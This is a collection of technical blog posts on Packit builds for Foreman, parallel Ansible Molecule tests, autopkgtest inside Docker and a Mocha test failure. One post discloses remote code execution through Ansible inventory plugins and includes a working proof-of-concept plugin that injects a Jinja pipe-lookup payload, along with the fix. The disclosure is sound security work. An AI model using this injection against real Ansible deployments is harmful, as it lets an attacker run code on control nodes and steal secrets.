+strings    grep 'OpenSSL 1'   grep 'OpenSSL 3'OpenSSL 1.0OpenSSL 1.1OpenSSL 3.2which openssl 2>&1/usr/bin/opensslOpenSSL location - %s
 Current version %s
 No response from command.
Pretty sure it won't apply like this with patch, but you get the idea. And yes, double-giggles for the fact that the error message says "Install latest SSL library to use HPONCFG" and the issue is that I have the latest SSL library installed.

14 May 2024

Evgeni Golov: Using Packit to build RPMs for projects that depend on or vendor your code

I am a huge fan of Packit as it allows us to provide RPMs to our users and testers directly from a pull-request, thus massively tightening the feedback loop and involving people who otherwise might not be able to apply the changes (for whatever reason) and "quickly test" something out. It's also a great way to validate that a change actually builds in a production environment, where no unnecessary development and test dependencies are installed. You can also run tests of the built packages on Testing Farm and automate pushing releases into Fedora/CentOS Stream, but this is neither a (plain) Packit advertisement post, nor is that functionality that I can talk about with a certain level of experience.

Adam recently asked why we don't have Packit builds for our Puppet modules and my first answer was: "well, puppet-* doesn't produce a thing we ship directly, so nobody dared to do it". My second answer was that I had blogged how to test a Puppet module PR with Packit, but I totally agree that the process was a tad cumbersome and could be improved. Now some madman did it and we all get to hear his story! ;-)

What is the problem anyway?
The Foreman Installer is a bit of Ruby code1 that provides a CLI to puppet apply based on a set of Puppet modules. As the Puppet modules can also be used outside the installer and have their own lifecycle, they live in separate git repositories and their releases get uploaded to the Puppet Forge. Users however do not want to (and should not have to) install the modules themselves. So we have to ship the modules inside the foreman-installer package. Packaging 25 modules for two packaging systems (we support Enterprise Linux and Debian/Ubuntu) seems like a lot of work. Especially if you consider that the main foreman-installer package would need to be rebuilt after each module change as it contains generated files based on the modules which are too expensive to generate at runtime. So we ship the modules inside the foreman-installer source release, thus vendoring those modules into the installer release. To do so we use librarian-puppet with a Puppetfile and either a Puppetfile.lock for stable releases or by letting librarian-puppet fetch latest for nightly snapshots. This works beautifully for changes that land in the development and release branches of our repositories - regardless if it's foreman-installer.git or any of the puppet-*.git ones. It also works nicely for pull-requests against foreman-installer.git. But because the puppet-* repositories do not map to packages, we assumed it wouldn't work well for pull-requests against those.

How can we solve this?
Well, the "obvious" solution is to build the foreman-installer package via Packit also for pull-requests against the puppet-* repositories. However, as usual, the devil is in the details. Packit by default clones the repository of the pull-request and tries to create a source tarball from that using git archive. As this might be too simple for many projects, one can define a custom create-archive action that runs after the pull-request has been cloned and produces the tarball instead. We already use that in the Packit configuration for foreman-installer to run the pkg:generate_source rake target which executes librarian-puppet for us. But now the pull-request is against one of the Puppet modules, so Packit will clone that, not the installer. We gotta clone foreman-installer on our own. And then point librarian-puppet at the pull-request. Fun.
Cloning is relatively simple, call git clone -- sorry Packit/Copr infrastructure. But the Puppet module pull-request? One can use :git => 'https://git.example.com/repo.git' in the Puppetfile to fetch a git repository. In fact, that's what we already do for our nightly snapshots. It also supports :ref => 'some_branch_or_tag_name', if the remote HEAD is not what you want. My brain first went "I know this! GitHub has this magic refs/pull/1/head and refs/pull/1/merge refs you can checkout to get the contents of the pull-request without bothering to add a remote for the source of the pull-request". Well, this requires knowing the ID of the pull-request, and Packit does not expose that in the environment variables available during create-archive. Wait, but we already have a checkout. Can we just say :git => '../.git'? Cloning a .git folder is totally possible after all.
[Librarian]     --> fatal: repository '../.git' does not exist
Could not checkout ../.git: fatal: repository '../.git' does not exist
Seems librarian disagrees. Damn. (Yes, I checked, the path exists.) Does it maybe just not like relative paths?! Yepp, using an absolute path absolutely works! For some reason it ends up checking out the default HEAD of the "real" (GitHub) remote, not of ../. Luckily this can be fixed by explicitly passing :ref => 'origin/HEAD', which resolves to the branch Packit created for the pull-request. Now we just need to put all of that together and remember to execute all commands from inside the foreman-installer checkout as that is where all our vendoring recipes etc live.

Putting it all together
Let's look at the diff between the packit.yaml for foreman-installer and the one I've proposed for puppet-pulpcore:
--- a/foreman-installer/.packit.yaml    2024-05-14 21:45:26.545260798 +0200
+++ b/puppet-pulpcore/.packit.yaml  2024-05-14 21:44:47.834162418 +0200
@@ -18,13 +18,15 @@
 actions:
   post-upstream-clone:
     - "wget https://raw.githubusercontent.com/theforeman/foreman-packaging/rpm/develop/packages/foreman/foreman-installer/foreman-installer.spec -O foreman-installer.spec"
+    - "git clone https://github.com/theforeman/foreman-installer"
+    - "sed -i '/theforeman.pulpcore/ s@:git.*@:git => \"#{__dir__}/../.git\", :ref => \"origin/HEAD\"@' foreman-installer/Puppetfile"
   get-current-version:
-    - "sed 's/-develop//' VERSION"
+    - "sed 's/-develop//' foreman-installer/VERSION"
   create-archive:
-    - bundle config set --local path vendor/bundle
-    - bundle config set --local without development:test
-    - bundle install
-    - bundle exec rake pkg:generate_source
+    - bash -c "cd foreman-installer && bundle config set --local path vendor/bundle"
+    - bash -c "cd foreman-installer && bundle config set --local without development:test"
+    - bash -c "cd foreman-installer && bundle install"
+    - bash -c "cd foreman-installer && bundle exec rake pkg:generate_source"
  1. It clones foreman-installer (in post-upstream-clone, as that felt more natural after some thinking)
  2. It adjusts the Puppetfile to use #{__dir__}/../.git as the Git repository, abusing the fact that a Puppetfile is really just a Ruby script (sorry Ben!) and knows the __dir__ it lives in (see the sketch after this list)
  3. It fetches the version from the foreman-installer checkout, so it's sort-of reasonable
  4. It performs all building inside the foreman-installer checkout
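For illustration, once the sed from the diff has run, the theforeman/pulpcore entry in the cloned foreman-installer Puppetfile ends up looking roughly like this (a sketch; the exact module line in the real Puppetfile may differ):

# Puppetfile inside the foreman-installer checkout, after the sed has run
mod 'theforeman/pulpcore', :git => "#{__dir__}/../.git", :ref => "origin/HEAD"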
Can this be used in other scenarios? I hope so! Vendoring is not unheard of. And testing your "consumers" (dependents? naming is hard) is good style anyway!

  1. three Ruby modules in a trench coat, so to say

28 April 2024

Evgeni Golov: Running Ansible Molecule tests in parallel

Or "How I've halved the execution time of our tests by removing ten lines". Catchy, huh? Also not exactly true, but quite close. Enjoy!

Molecule?!
"Molecule project is designed to aid in the development and testing of Ansible roles." No idea about the development part (I have vim and mkdir), but it's really good for integration testing. You can write different test scenarios where you define an environment (usually a container), a playbook for the execution and a playbook for verification. (And a lot more, but that's quite unimportant for now, so go read the docs if you want more details.) If you ever used Beaker for Puppet integration testing, you'll feel right at home (once you've thrown away Ruby and DSLs and embraced YAML for everything). I'd like to point out one thing, before we continue. Have another look at the quote above. "Molecule project is designed to aid in the development and testing of Ansible roles." That's right. The project was started in 2015 and was always about roles. There is nothing wrong about that, but given the Ansible world has moved on to collections (which can contain roles), you start facing challenges.

Challenges using Ansible Molecule in the Collections world
The biggest challenge didn't change since the last time I looked at the topic in 2020: running tests for multiple roles in a single repository ("monorepo") is tedious. Well, guess what a collection is? Yepp, a repository with multiple roles in it. It did get a bit better though. There is pytest-ansible now, which has integration for Molecule. This allows the execution of Molecule and even provides reasonable logging with something as short as:
% pytest --molecule roles/
That's much better than the shell script I used in 2020! However, being able to execute tests is one thing. Being able to execute them fast is another one. Given Molecule was initially designed with single roles in mind, it has switches to run all scenarios of a role (--all), but it has no way to run these in parallel. That's fine if you have one or two scenarios in your role repository. But what if you have 10 in your collection? "No way?!" you say after quickly running molecule test --help, "But there is "
% molecule test --help
Usage: molecule test [OPTIONS] [ANSIBLE_ARGS]...
 
  --parallel / --no-parallel      Enable or disable parallel mode. Default is disabled.
 
Yeah, that switch exists, but it only tells Molecule to place things in separate folders, you still need to parallelize yourself with GNU parallel or pytest. And here our actual journey starts!

Running Ansible Molecule tests in parallel
To run Molecule via pytest in parallel, we can use pytest-xdist, which allows pytest to run the tests in multiple processes. With that, our pytest call becomes something like this:
% MOLECULE_OPTS="--parallel" pytest --numprocesses auto --molecule roles/
What does that mean? --numprocesses auto tells pytest-xdist to spawn as many worker processes as there are CPUs, and MOLECULE_OPTS="--parallel" hands the --parallel flag down to the Molecule invocations. However, once we actually execute it, we see:
% MOLECULE_OPTS="--parallel" pytest --numprocesses auto --molecule roles/
 
WARNING  Driver podman does not provide a schema.
INFO     debian scenario test matrix: dependency, cleanup, destroy, syntax, create, prepare, converge, idempotence, side_effect, verify, cleanup, destroy
INFO     Performing prerun with role_name_check=0...
WARNING  Retrying execution failure 250 of: ansible-galaxy collection install -vvv --force ../..
ERROR    Command returned 250 code:
 
OSError: [Errno 39] Directory not empty: 'roles'
 
FileExistsError: [Errno 17] File exists: b'/home/user/namespace.collection/collections/ansible_collections/namespace/collection'
 
FileNotFoundError: [Errno 2] No such file or directory: b'/home/user/namespace.collection//collections/ansible_collections/namespace/collection/roles/my_role/molecule/debian/molecule.yml'
You might see other errors, other paths, etc, but they will all have one thing in common: they indicate that either files or directories are present while the tool expects them not to be, or vice versa. Ah yes, that fine smell of race conditions. I'll spare you the wild-goose chase I went on when trying to find out what the heck was calling ansible-galaxy collection install here. Instead, I'll just point at the following line:
INFO     Performing prerun with role_name_check=0...
What is this "prerun" you ask? Well "To help Ansible find used modules and roles, molecule will perform a prerun set of actions. These involve installing dependencies from requirements.yml specified at the project level, installing a standalone role or a collection." Turns out, this step is not --parallel-safe (yet?). Luckily, it can easily be disabled, for all our roles in the collection:
% mkdir -p .config/molecule
% echo 'prerun: false' >> .config/molecule/config.yml
This works perfectly, as long as you don't have any dependencies. And we don't have any, right? We didn't define any in a molecule/collections.yml, our collection has none. So let's push a PR with that and see what our CI thinks.
OSError: [Errno 39] Directory not empty: 'tests'
Huh?
FileExistsError: [Errno 17] File exists: b'remote.sh' -> b'/home/runner/work/namespace.collection/namespace.collection/collections/ansible_collections/ansible/posix/tests/utils/shippable/aix.sh'
What?
ansible_compat.errors.InvalidPrerequisiteError: Found collection at '/home/runner/work/namespace.collection/namespace.collection/collections/ansible_collections/ansible/posix' but missing MANIFEST.json, cannot get info.
Okay, okay, I get the idea… But why? Well, our collection might not have any dependencies, BUT MOLECULE DOES! When using Docker containers, it uses community.docker, when using Podman containers.podman, etc. So we have to install those before running Molecule, and everything should be fine. We can even use Molecule to do this!
$ molecule dependency --scenario <scenario>
And with that knowledge, the patch to enable parallel Molecule execution on GitHub Actions using pytest-xdist becomes:
diff --git a/.config/molecule/config.yml b/.config/molecule/config.yml
new file mode 100644
index 0000000..32ed66d
--- /dev/null
+++ b/.config/molecule/config.yml
@@ -0,0 +1 @@
+prerun: false
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 0f9da0d..df55a15 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -58,9 +58,13 @@ jobs:
       - name: Install Ansible
         run: pip install --upgrade https://github.com/ansible/ansible/archive/${{ matrix.ansible }}.tar.gz
       - name: Install dependencies
-        run: pip install molecule molecule-plugins pytest pytest-ansible
+        run: pip install molecule molecule-plugins pytest pytest-ansible pytest-xdist
+      - name: Install collection dependencies
+        run: cd roles/repository && molecule dependency -s suse
       - name: Run tests
-        run: pytest -vv --molecule roles/
+        run: pytest -vv --numprocesses auto --molecule roles/
+        env:
+          MOLECULE_OPTS: --parallel
   ansible-lint:
     runs-on: ubuntu-latest
"But you promised us you'd delete ten lines, that's just a +7-2 patch!" Oh yeah, sorry, the +10-20 (so a net -10) is the foreman-operations-collection version of the patch, which also migrates from an ugly bash script to pytest-ansible. And yes, that cuts down the execution from ~26 minutes to ~13 minutes. In the collection I originally tested this with, it's a more moderate "from 8-9 minutes to 5-6 minutes", which is still good though :)
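Outside of CI, the same setup boils down to three steps (a sketch; the suse scenario and the roles/repository path are simply the ones from the CI diff above, any scenario that declares the needed collections will do):

mkdir -p .config/molecule
echo 'prerun: false' >> .config/molecule/config.yml
(cd roles/repository && molecule dependency -s suse)   # pulls in community.docker / containers.podman etc.
MOLECULE_OPTS="--parallel" pytest -vv --numprocesses auto --molecule roles/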

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR
Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins
Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin
Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
            }
        }
    },
    "all": {
        "children": [
            "ungrouped"
        ]
    },
    "ungrouped": {
        "hosts": [
            "exploit.example.com"
        ]
    }
}
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja
To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],

        "something_funny": ""
    }
}
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?
This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py) And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe". Can something similar happen in other parts of Ansible? It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481. But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}
PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions
I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

8 April 2023

Evgeni Golov: Running autopkgtest with Docker inside Docker

While I am not the biggest fan of Docker, I must admit it has quite some reach across various service providers and can often be seen as an API for running things in isolated environments. One such service provider is GitHub when it comes to their Actions service. I have no idea what isolation technology GitHub uses on the outside of Actions, but inside you just get an Ubuntu system and can run whatever you want via Docker, as that comes pre-installed and pre-configured. This especially means you can run things inside vanilla Debian containers that are free from any GitHub or Canonical modifications one might not want ;-) So, if you want to run, say, lintian from sid, you can define a job to do so:
  lintian:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run lintian on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends lintian
      - run: lintian --info --display-info *.changes
This will run on Ubuntu (latest right now means 22.04 for GitHub), but then use Docker to run the debian:sid container and execute all further steps inside it. Pretty short and straightforward, right? Now lintian does static analysis of the package, it doesn't need to install it. What if we want to run autopkgtest, which performs tests on an actually installed package? autopkgtest comes with various "virt servers", which provide isolation of the testbed, so that it does not interfere with the host system. The simplest available virt server, autopkgtest-virt-null, doesn't actually provide any isolation, as it runs things directly on the host system. This might seem fine when executed inside an ephemeral container in a CI environment, but it also means that multiple tests have the potential to influence each other, as there is no way to revert the testbed to a clean state. For that, there are other, "real", virt servers available: chroot, lxc, qemu, docker and many more. They all have one thing in common: to use them, one needs to somehow provide an "image" (a prepared chroot, a tarball of a chroot, a VM disk, a container, …, you get it) to operate on, and most either bring a tool to create such an "image" or rely on a "registry" (online repository) to provide them. Most users of autopkgtest on GitHub (that I could find with their terrible search) are using either the null or the lxd virt servers. Probably because these are dead simple to set up (null) or the most "native" (lxd) in the Ubuntu environment. As I wanted to execute multiple tests that for sure would interfere with each other, the null virt server was out of the discussion pretty quickly. The lxd one also felt odd, as that meant I'd need to set up lxd (can be done in a few commands, but still) and it would need to download stuff from Canonical, incurring costs (which I couldn't care less about) and taking time (which I do care about!). Enter autopkgtest-virt-docker, which recently was added to autopkgtest! No need to set things up, as GitHub already did all the Docker setup for me, and almost no waiting time to download the containers, as GitHub does heavy caching of stuff coming from Docker Hub (or at least it feels like that). The only drawback? It was added in autopkgtest 5.23, which Ubuntu 22.04 doesn't have. "We need to go deeper" and run autopkgtest from a sid container! With this idea, our current job definition would look like this:
  autopkgtest:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run autopkgtest on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends autopkgtest autodep8 docker.io
      - run: autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
(--setup-commands="apt-get update" is needed as the container comes with an empty apt cache and wouldn't be able to find dependencies of the tested package) However, this will fail:
# autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
autopkgtest [10:20:54]: starting date and time: 2023-04-07 10:20:54+0000
autopkgtest [10:20:54]: version 5.28
autopkgtest [10:20:54]: host a82a11789c0d; command line:
  /usr/bin/autopkgtest bley_2.0.0-1_amd64.changes '--setup-commands=apt-get update' -- docker debian:sid
Unexpected error:
Traceback (most recent call last):
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 829, in mainloop
    command()
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 758, in command
    r = f(c, ce)
        ^^^^^^^^
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 692, in cmd_copydown
    copyupdown(c, ce, False)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 580, in copyupdown
    copyupdown_internal(ce[0], c[1:], upp)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 607, in copyupdown_internal
    copydown_shareddir(sd[0], sd[1], dirsp, downtmp_host)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 562, in copydown_shareddir
    shutil.copy(host, host_tmp)
  File "/usr/lib/python3.11/shutil.py", line 419, in copy
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/usr/lib/python3.11/shutil.py", line 258, in copyfile
    with open(dst, 'wb') as fdst:
         ^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/tmp/autopkgtest-virt-docker.shared.kn7n9ioe/downtmp/wrapper.sh'
autopkgtest [10:21:07]: ERROR: testbed failure: unexpected eof from the testbed
Running the same thing locally of course works, so there has to be something special about the setup at GitHub. But what?! A bit of digging revealed that autopkgtest-virt-docker tries to use a shared directory (using Docker's --volume) to exchange things with the testbed (for the downtmp-host capability). As my autopkgtest is running inside a container itself, nothing it tells the Docker daemon to mount will actually be visible to it. In retrospect this makes total sense, and autopkgtest-virt-docker has a switch to "fix" the issue: --remote, as the Docker daemon is technically remote when viewed from the place autopkgtest runs at. I'd argue this is not a bug in autopkgtest(-virt-docker), as the situation is actually cared for. There is even some auto-detection of "remote" daemons in the code, but that doesn't "know" how to detect the case where the daemon socket is mounted (vs being set as an environment variable). I've opened an MR (assume remote docker when running inside docker) which should detect the case of running inside a Docker container, which kind of implies the daemon is remote. Not sure the patch will be accepted (it is a band-aid after all), but in the meantime I am quite happy with using --remote and so could you ;-)
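The idea of that MR, treating the daemon as remote whenever we are running inside a container ourselves, boils down to a heuristic along these lines (a rough sketch of the concept in Python, not the actual autopkgtest patch):
import os

def probably_inside_docker():
    # Docker usually creates /.dockerenv inside the containers it starts
    if os.path.exists('/.dockerenv'):
        return True
    # and the cgroup hierarchy of PID 1 tends to mention docker or containerd
    try:
        with open('/proc/1/cgroup') as f:
            content = f.read()
    except OSError:
        return False
    return 'docker' in content or 'containerd' in content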

7 December 2021

Evgeni Golov: The Mocking will continue, until CI improves

One might think this blog is exclusively about weird language behavior and yelling at computers… Well, welcome to another episode of Jackass! Today's opponent is Ruby, or maybe minitest, or maybe Mocha. I'm not exactly sure, but it was a rather amusing exercise and I like to share my nightmares ;) It all started with the classical "you're using old and unmaintained software, please switch to something new". The first attempt was to switch from the ci_reporter_minitest plugin to the minitest-ci plugin. While the change worked great for Foreman itself, it broke the reporting in Katello - the tests would run but no junit.xml was generated and Jenkins rightfully complained that it got no test results. While investigating what the hell was wrong, we realized that Katello was already using a minitest reporting plugin: minitest-reporters. Loading two different reporting plugins seemed like a good source for problems, so I tried using the same plugin for Foreman too. Guess what? After a bit of massaging (mostly to disable the second minitest-reporters initialization in Katello) reporting of test results from Katello started to work like a charm. But now the Foreman tests started to fail. Not fail to report, fail to actually run. WTH… The failure was quite interesting too:
test/unit/parameter_filter_test.rb:5:in `block in <class:ParameterFilterTest>':
  Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
Yes, this is a single test file failing, all others were fine. The failing code doesn't look problematic at first glance:
require 'test_helper'
class ParameterFilterTest < ActiveSupport::TestCase
  let(:klass) do
    mock('Example').tap do |k|
      k.stubs(:name).returns('Example')
    end
  end
  test 'something' do
    something
  end
end
The failing line (5) is mock('Example').tap and for some reason Mocha thinks it's not initialized here. This certainly has something to do with how the various reporting plugins inject themselves, but I really didn't want to debug how to run two reporting plugins in parallel (which, as you remember, didn't expose this behavior). So the only real path forward was to debug what's happening here. Calling the test on its own, with one of the working reporters, was the first step:
$ bundle exec rake test TEST=test/unit/parameter_filter_test.rb TESTOPTS=-v
 
#<Mocha::Mock:0x0000557bf1f22e30>#test_0001_permits plugin-added attribute = 0.04 s = .
#<Mocha::Mock:0x0000557bf12cf750>#test_0002_permits plugin-added attributes from blocks = 0.49 s = .
 
Wait, what? #<Mocha::Mock: >? Shouldn't this read more like ParameterFilterTest:: as it happens for every single other test in our test suite? It definitely should! That's actually great, as it tells us that there is really something wrong with the test and the change of the reporting plugin just makes it worse. What comes next is sheer luck. Well, that, and years of experience in yelling at computers. We use let(:klass) to define an object called klass and this object is a Mocha::Mock that we'll use in our tests later. Now klass is a very common term in Ruby when talking about classes and needing to store them mostly because one can't use class which is a keyword. Is something else in the stack using klass and our let is overriding that, making this whole thing explode? It was! The moment we replaced klass with klass1 (silly, I know, but there also was a klass2 in that code, so it did fit), things started to work nicely. I really liked Tomer's comment in the PR: "no idea why, but I am not going to dig into mocha to figure that out." Turns out, I couldn't let (HAH!) the code rest and really wanted to understand what happened there. What I didn't want to do is to debug the whole Foreman test stack, because it is massive. So I started to write a minimal reproducer for the issue. All starts with a Gemfile, as we need a few dependencies:
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Then a Rakefile:
require 'rake/testtask'
Rake::TestTask.new(:test) do |t|
  t.libs << 'test'
  t.test_files = FileList["test/**/*_test.rb"]
end
task :default => :test
And a test! I took the liberty to replace ActiveSupport::TestCase with Minitest::Test, as the test won't be using any Rails features and I wanted to keep my environment minimal.
require 'minitest/autorun'
require 'minitest/spec'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  extend Minitest::Spec::DSL
  let(:klass) do
    mock('Example').tap do |k|
      k.stubs(:name).returns('Example')
    end
  end
  def test_lol
    assert klass
  end
end
Well, damn, this passed! Is it Rails after all that breaks stuff? Let's add it to the Gemfile!
$ vim Gemfile
$ bundle install
$ bundle exec rake test TESTOPTS=-v
 
#<Mocha::Mock:0x0000564bbfe17e98>#test_lol = 0.00 s = .
Wait, I didn't change anything and it's already failing?! Fuck! I mean, cool! But the test isn't minimal yet. What can we reduce? let is just a fancy, lazy def, right? So instead of let(:klass) we should be able to write def klass and achieve a similar outcome and drop that Minitest::Spec.
require 'minitest/autorun'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  def klass
    mock
  end
  def test_lol
    assert klass
  end
end
$ bundle exec rake test TESTOPTS=-v
 
/home/evgeni/Devel/minitest-wtf/test/parameter_filter_test.rb:5:in `klass': Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:68:in `format_line'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:15:in `record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:682:in `block in record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in `each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in `record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:324:in `run_one_method'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:311:in `block (2 levels) in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in `each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in `block in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:350:in `on_signal'
